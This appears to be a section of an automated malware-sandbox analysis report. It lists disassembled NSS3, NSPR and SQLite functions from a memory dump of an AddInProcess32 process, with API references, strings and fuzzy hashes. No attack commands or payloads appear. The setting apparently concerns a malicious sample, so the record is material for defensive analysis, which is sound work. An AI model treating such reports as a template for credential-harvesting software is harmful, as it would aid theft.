                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$MallocRealloc___swprintf_l
                                                                                      • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                      • API String ID: 1169563700-3274975309
                                                                                      • Opcode ID: bc64d023817d9af532ba9dc94c92b568d044f114088e7fe34c87efa52f3ec27a
                                                                                      • Instruction ID: 447594a23d0caef16cf9b7c4568c092bda6257618d5b2f1cf3712ae4a6ee8574
                                                                                      • Opcode Fuzzy Hash: bc64d023817d9af532ba9dc94c92b568d044f114088e7fe34c87efa52f3ec27a
                                                                                      • Instruction Fuzzy Hash: CA310170208706ABD7148F29DC80A56B3B2FF4132872D479DE66587ED0FB31F849C666
                                                                                      APIs
                                                                                      • PR_GetTraceNameFromHandle.NSS3(00000000,00000004,?,?), ref: 6CCD8DC8
                                                                                      • PR_FindNextTraceRname.NSS3(00000000,00000000), ref: 6CCD8E30
                                                                                        • Part of subcall function 6CCD8BAC: PR_LogPrint.NSS3(PRTrace: FindNextRname: Rhandle: %p, QHandle: %p, Returns: %p,?,?), ref: 6CCD8BE5
                                                                                      • PR_LogPrint.NSS3(PRTrace: GetTraceHandleFromName:QName: %s, RName: %s,?,?), ref: 6CCD8DA9
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      • PR_FindNextTraceQname.NSS3(00000000), ref: 6CCD8E42
                                                                                      • PR_LogPrint.NSS3(PR_Counter: GetConterHandleFromName: %p,00000000), ref: 6CCD8E68
                                                                                      Strings
                                                                                      • PRTrace: GetTraceHandleFromName:QName: %s, RName: %s, xrefs: 6CCD8DA4
                                                                                      • PR_Counter: GetConterHandleFromName: %p, xrefs: 6CCD8E63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrintTrace$FindNext___swprintf_l$CriticalCurrentEnterExplodeFromHandleInitNameQnameR_vsmprintfR_vsnprintfRnameSectionThreadTime
                                                                                      • String ID: PRTrace: GetTraceHandleFromName:QName: %s, RName: %s$PR_Counter: GetConterHandleFromName: %p
                                                                                      • API String ID: 1252396916-1838145021
                                                                                      • Opcode ID: 0c64b49cb1e3a64ced1a2e0f7f1cd0985f6626f3855c8c3f6629ab1d1865953e
                                                                                      • Instruction ID: 12523e1b617395a354232b49f36f1c7b4ed111c24e8f0ba65a11bad64d3a6c8c
                                                                                      • Opcode Fuzzy Hash: 0c64b49cb1e3a64ced1a2e0f7f1cd0985f6626f3855c8c3f6629ab1d1865953e
                                                                                      • Instruction Fuzzy Hash: CF21273A2081466B97024E599890DEB7BBADB1331C70A1097DA449FE41F623F908C7D1
                                                                                      APIs
                                                                                      • PR_GetCounterNameFromHandle.NSS3(00000000,00000004,?,?), ref: 6CCD0EEA
                                                                                      • PR_FindNextCounterRname.NSS3(00000000,00000000), ref: 6CCD0F52
                                                                                        • Part of subcall function 6CCD0E3A: PR_LogPrint.NSS3(PR_Counter: FindNextRname: Rhandle: %p, QHandle: %p, Returns: %p,?,?), ref: 6CCD0E73
                                                                                      • PR_LogPrint.NSS3(PR_Counter: GetCounterHandleFromName:QName: %s, RName: %s,?,?), ref: 6CCD0ECB
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      • PR_FindNextCounterQname.NSS3(00000000), ref: 6CCD0F64
                                                                                      • PR_LogPrint.NSS3(PR_Counter: GetConterHandleFromName: %p,00000000), ref: 6CCD0F8A
                                                                                      Strings
                                                                                      • PR_Counter: GetCounterHandleFromName:QName: %s, RName: %s, xrefs: 6CCD0EC6
                                                                                      • PR_Counter: GetConterHandleFromName: %p, xrefs: 6CCD0F85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPrint$FindNext___swprintf_l$CriticalCurrentEnterExplodeFromHandleInitNameQnameR_vsmprintfR_vsnprintfRnameSectionThreadTime
                                                                                      • String ID: PR_Counter: GetConterHandleFromName: %p$PR_Counter: GetCounterHandleFromName:QName: %s, RName: %s
                                                                                      • API String ID: 3267183220-454890129
                                                                                      • Opcode ID: 5261385f129c09dd17501e121e75de4308ece81b25a72acc4851560c68cba2eb
                                                                                      • Instruction ID: 63b418c539a607063be39b8ff0c881fd22d5380f2140e46bd2da2103eaf76c31
                                                                                      • Opcode Fuzzy Hash: 5261385f129c09dd17501e121e75de4308ece81b25a72acc4851560c68cba2eb
                                                                                      • Instruction Fuzzy Hash: 15218F3260C1C96B87019A6D9AD09DB7BBADF4331C72A4096EA84D7E01F723F508C393
                                                                                      APIs
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC6ACDA
                                                                                      • sqlite3_mutex_enter.NSS3(?,?), ref: 6CC6ACE5
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC6AD8A
                                                                                      • sqlite3_mutex_leave.NSS3(?,?), ref: 6CC6AD92
                                                                                      Strings
                                                                                      • source and destination must be distinct, xrefs: 6CC6ACF0
                                                                                      • destination database is in use, xrefs: 6CC6AD65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                      • String ID: destination database is in use$source and destination must be distinct
                                                                                      • API String ID: 1477753154-3432668017
                                                                                      • Opcode ID: ec9ac427dda3f3ae00cd25f3e170cab0ef26f999a0f13dfdc7272f6cc15b759a
                                                                                      • Instruction ID: 4775626192cb0a2faf243cfe35919ad20d0296897532236e346a37cf7e69dcac
                                                                                      • Opcode Fuzzy Hash: ec9ac427dda3f3ae00cd25f3e170cab0ef26f999a0f13dfdc7272f6cc15b759a
                                                                                      • Instruction Fuzzy Hash: A621F572508711BBDB265F13DDC0E6BBBA8EF41B28F20425EE8445AE91FB31D85487D0
                                                                                      APIs
                                                                                      • sqlite3_value_blob.NSS3(?), ref: 6CC67D4B
                                                                                        • Part of subcall function 6CCA1C46: memset.VCRUNTIME140(00000000,00000000,6CC8D972,00000000,?,6CC90EF3,00000200,00000000,?,6CC90F7A,385E8905,00000000,00000000,6CC8D972,00000000), ref: 6CCA1C63
                                                                                      • sqlite3_result_error_nomem.NSS3(?), ref: 6CC67D70
                                                                                      • ___swprintf_l.LIBCMT(00000018,00000000,%llu,00000000,00000000), ref: 6CC67D88
                                                                                      • __aulldiv.LIBCMT ref: 6CC67DC0
                                                                                      • ___swprintf_l.LIBCMT(00000018,?, %llu,00000000,?,?,00000000,?,00000000), ref: 6CC67DCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l$__aulldivmemsetsqlite3_result_error_nomemsqlite3_value_blob
                                                                                      • String ID: %llu$%llu
                                                                                      • API String ID: 1210479061-4283164361
                                                                                      • Opcode ID: 1c5e3284ff17c3c213d0b964e0dd6868ab4fdeafb9870d20cd2af5e30b47ddd0
                                                                                      • Instruction ID: 1d791a8cb4e2e0d5bd1e718d68126c4ce30190f6bd2de63b4c75964092889d83
                                                                                      • Opcode Fuzzy Hash: 1c5e3284ff17c3c213d0b964e0dd6868ab4fdeafb9870d20cd2af5e30b47ddd0
                                                                                      • Instruction Fuzzy Hash: B121F6B2940615BBDB109B66CD81FAB775CEF81738F044A64F81467F80FB25991687E0
                                                                                      APIs
                                                                                      • PR_LogPrint.NSS3(NewTraceBuffer: logSegments: %ld, logEntries: %ld, logEntriesPerSegment: %ld, logSegSize: %ld,00000002,?,?,?,?,?,?,?,6CCD956C,00100000,00000000,6CCD8964), ref: 6CCD88D2
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      • PR_Malloc.NSS3(00000030,?,?,?,?,6CCD956C,00100000,00000000,6CCD8964), ref: 6CCD88E1
                                                                                      • PR_LogPrint.NSS3(PRTrace: Failed to get trace buffer,?,?,?,?,6CCD956C,00100000,00000000,6CCD8964), ref: 6CCD8902
                                                                                      • PR_LogPrint.NSS3(PRTrace: Got trace buffer of size: %ld, at %p,00000000,?,?,?,?,6CCD956C,00100000,00000000,6CCD8964), ref: 6CCD891C
                                                                                        • Part of subcall function 6CCC78D9: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A27
                                                                                        • Part of subcall function 6CCC78D9: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A99
                                                                                        • Part of subcall function 6CCC78D9: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7AE0
                                                                                        • Part of subcall function 6CCC78D9: OutputDebugStringA.KERNEL32(0000000A), ref: 6CCC7B32
                                                                                        • Part of subcall function 6CCC78D9: _PR_MD_UNLOCK.NSS3(05203804), ref: 6CCC7B6A
                                                                                        • Part of subcall function 6CCC78D9: PR_LogFlush.NSS3(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7C98
                                                                                      Strings
                                                                                      • NewTraceBuffer: logSegments: %ld, logEntries: %ld, logEntriesPerSegment: %ld, logSegSize: %ld, xrefs: 6CCD88CD
                                                                                      • PRTrace: Failed to get trace buffer, xrefs: 6CCD88FD
                                                                                      • PRTrace: Got trace buffer of size: %ld, at %p, xrefs: 6CCD8917
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugOutputString$Print$___swprintf_l$CriticalCurrentEnterExplodeFlushInitMallocR_vsmprintfR_vsnprintfSectionThreadTime
                                                                                      • String ID: NewTraceBuffer: logSegments: %ld, logEntries: %ld, logEntriesPerSegment: %ld, logSegSize: %ld$PRTrace: Failed to get trace buffer$PRTrace: Got trace buffer of size: %ld, at %p
                                                                                      • API String ID: 2586545227-775203313
                                                                                      • Opcode ID: 78da16cef52d3585a63c4166365a1f206b52fb2ea25f9713e434aa059e71522b
                                                                                      • Instruction ID: 7766cea1664ca8b93b0caa0532c529c7cf507dd81b2313ae9962541402f020b9
                                                                                      • Opcode Fuzzy Hash: 78da16cef52d3585a63c4166365a1f206b52fb2ea25f9713e434aa059e71522b
                                                                                      • Instruction Fuzzy Hash: 7F218EB1722202AEFF04CF2DD945F537BFDE787334B85416AE24A9B650E2319444CB91
                                                                                      APIs
                                                                                      • sqlite3_exec.NSS3(E1E80875,SAVEPOINT fts3,00000000,00000000,00000000,?,?,?,?,6CC7E37E,?), ref: 6CC9CD33
                                                                                        • Part of subcall function 6CC7906C: sqlite3_bind_int.NSS3(00000000,00000001,?,?,00000000,00000000,?,?,6CC811E2,?,00000000), ref: 6CC790A9
                                                                                        • Part of subcall function 6CC7906C: sqlite3_bind_int.NSS3(00000000,00000002,?,00000000,00000001,?,?,00000000,00000000,?,?,6CC811E2,?,00000000), ref: 6CC790B7
                                                                                        • Part of subcall function 6CC7906C: sqlite3_step.NSS3(00000000,00000000,00000002,?,00000000,00000001,?,?,00000000,00000000,?,?,6CC811E2,?,00000000), ref: 6CC790BD
                                                                                        • Part of subcall function 6CC7906C: sqlite3_reset.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CC7911C
                                                                                      • sqlite3_exec.NSS3(E1E80875,ROLLBACK TO fts3,00000000,00000000,00000000,?,?,?,6CC7E37E,?), ref: 6CC9CD61
                                                                                      • sqlite3_exec.NSS3(E1E80875,RELEASE fts3,00000000,00000000,00000000,E1E80875,ROLLBACK TO fts3,00000000,00000000,00000000,?,?,?,6CC7E37E,?), ref: 6CC9CD71
                                                                                      • sqlite3_exec.NSS3(E1E80875,RELEASE fts3,00000000,00000000,00000000,?,?,?,6CC7E37E,?), ref: 6CC9CD86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_exec$sqlite3_bind_int$sqlite3_resetsqlite3_step
                                                                                      • String ID: RELEASE fts3$ROLLBACK TO fts3$SAVEPOINT fts3
                                                                                      • API String ID: 1919743369-3733817512
                                                                                      • Opcode ID: d688c7ae005b2d465448a62a4e77ed60a61be678e42947d4da2a909c0fc79739
                                                                                      • Instruction ID: c6b21a217d449e5f93d1e6dd4c612efd5cee2d7d694abf04dfa40d19be8e5bfb
                                                                                      • Opcode Fuzzy Hash: d688c7ae005b2d465448a62a4e77ed60a61be678e42947d4da2a909c0fc79739
                                                                                      • Instruction Fuzzy Hash: 3801ADF380952D3EBA102215BDC0C7BB69CEB059EC7114261F94862E60F702AC6641F1
                                                                                      APIs
                                                                                      • TlsAlloc.KERNEL32(?,6CCD41D1,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE3E
                                                                                      • TlsAlloc.KERNEL32(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE45
                                                                                      • TlsAlloc.KERNEL32(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE4C
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE58
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6CCCFE69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc$AddressHandleModuleProc
                                                                                      • String ID: SetThreadDescription$kernel32.dll
                                                                                      • API String ID: 2357826961-49971893
                                                                                      • Opcode ID: b10de160e911d34e9025f2e887e9bbcf0dd7630b9abc9e27ee62e629f644904a
                                                                                      • Instruction ID: b17ef94d17b662a0633297b2be9f36a8e9236617619d401b6e27373efd789a2f
                                                                                      • Opcode Fuzzy Hash: b10de160e911d34e9025f2e887e9bbcf0dd7630b9abc9e27ee62e629f644904a
                                                                                      • Instruction Fuzzy Hash: E0E042B0E23365DBFF107F798D088493EFCEA4B295780086BA609D3654EA7494049F91
                                                                                      APIs
                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06ABC
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_Alloc_Util.NSS3(0000000C,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06B48
                                                                                      • PORT_Alloc_Util.NSS3(00000004,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06B98
                                                                                      • PORT_Alloc_Util.NSS3(00000008,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06CA2
                                                                                      • PORT_Alloc_Util.NSS3(-00000010,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06CE7
                                                                                      • memcpy.VCRUNTIME140(00000010,00000000,00000000,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000), ref: 6CD06D14
                                                                                      • PORT_Alloc_Util.NSS3(?,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000,?,?,?), ref: 6CD06DDB
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,0000000C,00000000,?,?,6CD069B9,?,00000000,00000000,00000000,?,00000123,00000000), ref: 6CD06DEF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc_Util$memcpy$ErrorMalloc
                                                                                      • String ID:
                                                                                      • API String ID: 2807195134-0
                                                                                      • Opcode ID: 3eff09964ee49b1d9ed2a3f6c16a91fabd7417fd0d841ff6feef886e6a15f659
                                                                                      • Instruction ID: 8c1159925dfb93a38d665efdbc22454ef3f39e544632358c268d270c08930d89
                                                                                      • Opcode Fuzzy Hash: 3eff09964ee49b1d9ed2a3f6c16a91fabd7417fd0d841ff6feef886e6a15f659
                                                                                      • Instruction Fuzzy Hash: 3C81AE71702606DBEB189F2DC4A136DBAA1EF40328F20853DCE69CBEB4D675D4C6C661
                                                                                      APIs
                                                                                      • PK11_IsInternalKeySlot.NSS3(00000000), ref: 6CCF494C
                                                                                      • strchr.VCRUNTIME140(00000000,0000003A), ref: 6CCF4960
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000000,00000000,00000000), ref: 6CCF49A9
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000,00000000,6CCF51BE,00000000,?), ref: 6CCF49C4
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001,00000000,00000000,-00000001,?,?,00000000,00000000,6CCF51BE,00000000,?), ref: 6CCF49DD
                                                                                      • PK11_FreeSlot.NSS3(00000000), ref: 6CCF4AAA
                                                                                      • PK11_ReferenceSlot.NSS3(00000000), ref: 6CCF4AB6
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000,00000000,6CCF51BE,00000000,?), ref: 6CCF49F1
                                                                                        • Part of subcall function 6CCDE2FE: PR_Lock.NSS3(6CCE3B2A,?,?,?,?,6CCDEADA,?,?,?,6CCDDC30,?,?), ref: 6CCDE304
                                                                                        • Part of subcall function 6CCDE604: PR_Unlock.NSS3(6CCE3B4E,?,?,?,?,6CCDEADA,?,?,?,6CCDDC30,?,?), ref: 6CCDE60A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_Slotmemcpy$Alloc_ArenaFreeInternalLockReferenceUnlockUtilstrchr
                                                                                      • String ID:
                                                                                      • API String ID: 3298604146-0
                                                                                      • Opcode ID: b2d156062b166a2a15de92f07b827ae6bffac1d9a3f68201ffc9eaa0df904cab
                                                                                      • Instruction ID: d42916b0229ebb96da85026d106d13c1dfbad71076e21dc4696a6d97ea10d60b
                                                                                      • Opcode Fuzzy Hash: b2d156062b166a2a15de92f07b827ae6bffac1d9a3f68201ffc9eaa0df904cab
